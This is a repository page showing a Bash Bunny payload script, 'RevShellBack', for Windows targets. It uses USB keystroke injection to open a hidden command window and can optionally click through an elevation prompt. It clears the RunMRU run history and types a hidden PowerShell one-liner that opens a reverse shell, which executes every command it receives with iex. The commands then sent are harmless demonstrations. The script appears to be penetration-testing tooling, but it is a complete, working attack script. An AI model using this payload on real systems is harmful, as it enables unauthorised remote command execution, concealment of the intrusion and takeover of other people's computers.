hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
bashbunny-payloads/payloads/library/execution/RevShellBack/payload.txt

63 lines
2.3 KiB
Bash
Raw Blame History

#!/bin/bash
#
# Title: RevShellBack
# Description: Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
# Author: NodePoint
# Version: 0.1.3
# Category: Execution
# Target: Windows
# Attackmodes: Ethernet, HID
# Set attack mode
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
# Set variables
GET HOST_IP
GET TARGET_HOSTNAME
# Netcat port number
NCPORT=4444
# Delay before attempting to connect to the netcat listener (ms)
NCDELAY=200
ADMIN=false
# Setup networking
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A INPUT -i usb0 -p tcp --dport $NCPORT -j ACCEPT
iptables -t nat -A PREROUTING -i usb0 -p tcp --dport $NCPORT -j DNAT --to-destination $HOST_IP:$NCPORT
# Open CMD
LED STAGE1
if [ "$ADMIN" = true ] ; then
# Bypass UAC
RUN WIN powershell -c "Start-Process cmd -verb runas"
Q DELAY 1500
Q ALT Y
Q DELAY 300
# Hide CMD
Q STRING "mode 18,1 & color FE & cd C:\ & title "
Q ENTER
else
# Run as normal user
RUN WIN cmd /K "mode 18,1 & color FE & cd C:\ & title "
Q DELAY 150
fi
# Initiate reverse shell
LED STAGE2
Q STRING "powershell -W Hidden \"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue;Start-Sleep -m $NCDELAY;\$sm=(New-Object Net.Sockets.TCPClient('$HOST_IP',$NCPORT)).GetStream();[byte[]]\$bt=0..65535|%{0};while((\$i=\$sm.Read(\$bt,0,\$bt.Length)) -ne 0){;\$d=(New-Object Text.ASCIIEncoding).GetString(\$bt,0,\$i);\$st=([text.encoding]::ASCII).GetBytes((iex \$d 2>&1));\$sm.Write(\$st,0,\$st.Length)}\" & exit"
Q ENTER
# Attack -- commands go within EOF
LED SPECIAL1
nc -q 0 -l -p $NCPORT <<EOF
echo "Hello. :)" > "C:/Users/\$env:username/Desktop/reverseshelled.txt"
\$Eject = New-Object -ComObject "Shell.Application";\$Eject.Namespace(17).Items() | Where-Object { \$_.Type -eq "CD Drive" } | foreach { \$_.InvokeVerb("Eject") }
calc;
Start-Sleep -m 300;Add-Type -AssemblyName PresentationCore,PresentationFramework;[System.Windows.MessageBox]::Show("Hello, \$env:username.\`nYour PC name is '$TARGET_HOSTNAME'.\`n\`nCheck your desktop for the file 'reverseshelled.txt'.\`nIf you have a CD/DVD drive with a disc tray, check that too.",'RevShellBack','Ok','Info')
EOF
# Done
ATTACKMODE OFF
LED FINISH
Reference in New Issue View Git Blame Copy Permalink